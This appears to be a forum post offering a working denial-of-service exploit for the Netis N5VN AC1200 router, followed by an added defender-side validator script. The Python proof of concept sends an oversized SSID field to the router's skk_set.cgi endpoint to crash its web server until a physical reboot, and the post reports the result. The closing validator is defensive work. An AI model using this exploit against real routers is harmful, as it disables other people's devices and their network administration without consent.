
WiFi Netis N5VN AC1200 - Buffer Overflow DOS (Denial of Service)

concac

Rank: floppy-disk | User | Registered: 12.01.2023 | Messages: 2 | Reactions: 2
Hi Guys

Overview

  • There exists a buffer overflow vulnerability in the Netis N5VN AC1200 router that can allow an attacker to crash the web server running on the router by sending a crafted request.
  • To bring back the HTTP web server, a user must physically reboot the router.

Proof of Concept (Python)

  • POST request to change ssid Wireless 2.4G ('ssid': 'QQ==' * 5000)
  • Successfully: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))
  • nmap 192.168.1.254 -p 80 80/tcp closed http
  • Version: Netis N5VN AC1200 V1.0.1.1742


Python:
import requests

url = 'http://192.168.1.254/cgi-bin/skk_set.cgi'

# Adjust the Authorization header to match your own session (the digest values below are placeholders from the author's configuration)
headers = {
    'Authorization': 'Digest username="admin", realm="N5VN", nonce="FAGasd12d1WAgMiAwMDoxNQWQWQyMDI0"',
    'Accept': '*/*',
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'Origin': 'http://192.168.1.254',
    'Referer': 'http://192.168.1.254/index.htm',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'en-US,en;q=0.9',
    'Connection': 'close'
}

data = {
    'wlanEnabled': '1',
    'wlanMacAddr': 'bc:e2:04:1g:ea:b5',
    'wlanMode': '0',
    'wlanBand': '11',
    'ssid': 'QQ==' * 5000, # 'QQ==' is base64 for 'A'; repeated 5000 times this gives a 20000-character ssid field
    'broadSSID': '1',
    'regDomain': '1',
    'channel': '0',
    'channelWidth': '0',
    'encrypt': '6',
    'wpaPskType': '3',
    'wpaPskFormat': '0',
    'wpaPsk': 'MqwdwasdsadDkqqw2321DQ==',
    'rp_encrypt': '0',
    'wl_base_set': 'save',
    'wl_idx': '6',
    'wscConfigured': '1',
    'app': 'base',
    'wl_link': '0'
}

try:
    response = requests.post(url, headers=headers, data=data)
    print(response.text)
except Exception as e:
    print(f"Successfully: {e}")
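
A defender-side check, added here as an example and not part of the original post: it validates a skk_set.cgi form body before it would reach the CGI, using the 802.11 limit of 32 SSID octets (44 base64 characters once encoded the way the form encodes it) as the bound, and it checks the encoded length before decoding because a lenient base64 decoder stops at the first padding and would report 'QQ==' * 5000 as a single byte. FIELD_MAX_CHARS and the sample bodies are constructed assumptions.

```python
import base64
import binascii
from urllib.parse import parse_qs

# An 802.11 SSID is at most 32 octets. The router's form carries it
# base64-encoded in the 'ssid' field ('QQ==' is base64 for 'A'), so the
# encoded value of a maximal SSID is 44 characters.
SSID_MAX_OCTETS = 32
SSID_MAX_ENCODED = 44
# Hypothetical ceiling for any other field value, chosen for this example.
FIELD_MAX_CHARS = 256


def check_wlan_form(body: str) -> list:
    """Return findings for one skk_set.cgi form body; an empty list means it passed."""
    findings = []
    fields = parse_qs(body, keep_blank_values=True)
    for name, values in fields.items():
        for raw in values:
            if name != "ssid" and len(raw) > FIELD_MAX_CHARS:
                findings.append("%s: %d chars exceeds %d" % (name, len(raw), FIELD_MAX_CHARS))
    for raw in fields.get("ssid", []):
        # Check the encoded length first: a lenient base64 decoder stops at the
        # first '==' and would report 'QQ==' * 5000 as one decoded byte.
        if len(raw) > SSID_MAX_ENCODED:
            findings.append("ssid: encoded length %d exceeds %d" % (len(raw), SSID_MAX_ENCODED))
            continue
        try:
            decoded = base64.b64decode(raw, validate=True)
        except (binascii.Error, ValueError):
            findings.append("ssid: not valid base64")
            continue
        # 44 base64 characters without padding still encode 33 octets, so the
        # decoded length must be checked as well.
        if len(decoded) > SSID_MAX_OCTETS:
            findings.append("ssid: %d octets exceeds %d" % (len(decoded), SSID_MAX_OCTETS))
        if not decoded:
            findings.append("ssid: empty")
    return findings


# Constructed sample bodies (not captured traffic): a normal save of the
# SSID "HomeNet", and a body shaped like the PoC above.
NORMAL_BODY = "wlanEnabled=1&ssid=SG9tZU5ldA%3D%3D&wl_base_set=save"
POC_BODY = "wlanEnabled=1&ssid=" + "QQ==" * 5000 + "&wl_base_set=save"
```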